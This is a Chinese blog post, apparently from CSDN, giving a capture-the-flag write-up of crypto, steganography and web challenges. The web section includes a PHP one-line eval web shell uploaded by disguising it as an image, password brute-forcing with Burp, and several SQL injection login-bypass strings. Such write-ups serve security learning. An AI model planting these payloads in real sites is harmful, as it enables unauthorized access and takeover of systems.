3月26日

简单的base(Crypto)

打开文件,得到一串base64编码,解码得到另一串字符

进行base85解码,得到flag

Base85

Base85是一种类似于Base64的二进制文本编码形式,通过使用五个ASCII字符来表示四个字节的二进制数据。例如,它用于将图像嵌入到Adobe PDF文件中。

Base85 包含下列字符:

$%()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~
————————————————
原文链接:https://blog.csdn.net/clotten/article/details/134342188

 

你猜(Crypto)

打开文件得到编码,编码以“佛曰”开头,为与佛论禅密码,bugku工具解码得到base64编码

解码得到flag

 

二维码(Misc)

打开图片,得到一张二维码,草料解码,得到flag

 

你以为就一张图吗?(Misc)

打开图片,用Stegsolve分析发现进行了lsb隐写,得到第二张图片,图片里有flag

LSB隐写原理

LSB即为最低有效位(Least Significant Bit,lsb),我们知道,图片中的图像像素一般是由RGB三原色(红绿蓝)组成,每一种颜色占用8位,取值范围为0x00~0xFF,即有256种颜色,一共包含了256的3次方的颜色,即16777216种颜色。而人类的眼睛可以区分约1000万种不同的颜色,这就意味着人类的眼睛无法区分余下的颜色大约有6777216种。

LSB隐写就是修改RGB颜色分量的最低二进制位也就是最低有效位(LSB),而人类的眼睛不会注意到这前后的变化,每个像数可以携带3比特的信息。
————————————————
原文链接:https://blog.csdn.net/qq_38154820/article/details/122694645

 

 古典(Crypto)

打开文件,查看编码,推出应该是栅栏密码,随波逐流跑一下,得到flag

 

好师兄!(Misc)

打开文件,查看发现内容应该是图片的base64编码,使用工具转图片

把得到的图片进行分析,提取隐藏信息,得到flag

 

爆炸吧!小黑子(Web)

输入默认用户名admin和随机密码,bp抓包,爆破密码,得到密码为1q2w3e4r5t

查看响应头,得到flag

 

来给师兄上个马(Web)

看到页面,判断为文件上传,上传一句话木马shell.php,显示只允许上传图片

一句话木马

<?php @eval($_POST['shell']);?>

将shell.php修改为shell.jpg上传,上传成功,显示上传成功后,shell文件被改回php文件,路径是upload/shell.php

蚁剑连接,得到flag

 

啊?(Web)

查看源代码,发现一串base64编码,解码,得到一个文件路径

在url中输入路径,访问文件,得到一个登录页面

查看网页,没有对账号密码的提示,直接用bp爆账号和密码,得到账号密码及flag

(看到爆出来的账号admin'or''=',才知道这里的考点其实是sql注入绕过密码登录)

举例:

万能账号:admin'or'1'='1

万能密码:admin' #(将万能密码输在用户名框,密码随意)

特殊万能密码:'='(输在密码框里)

 

  • 40
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值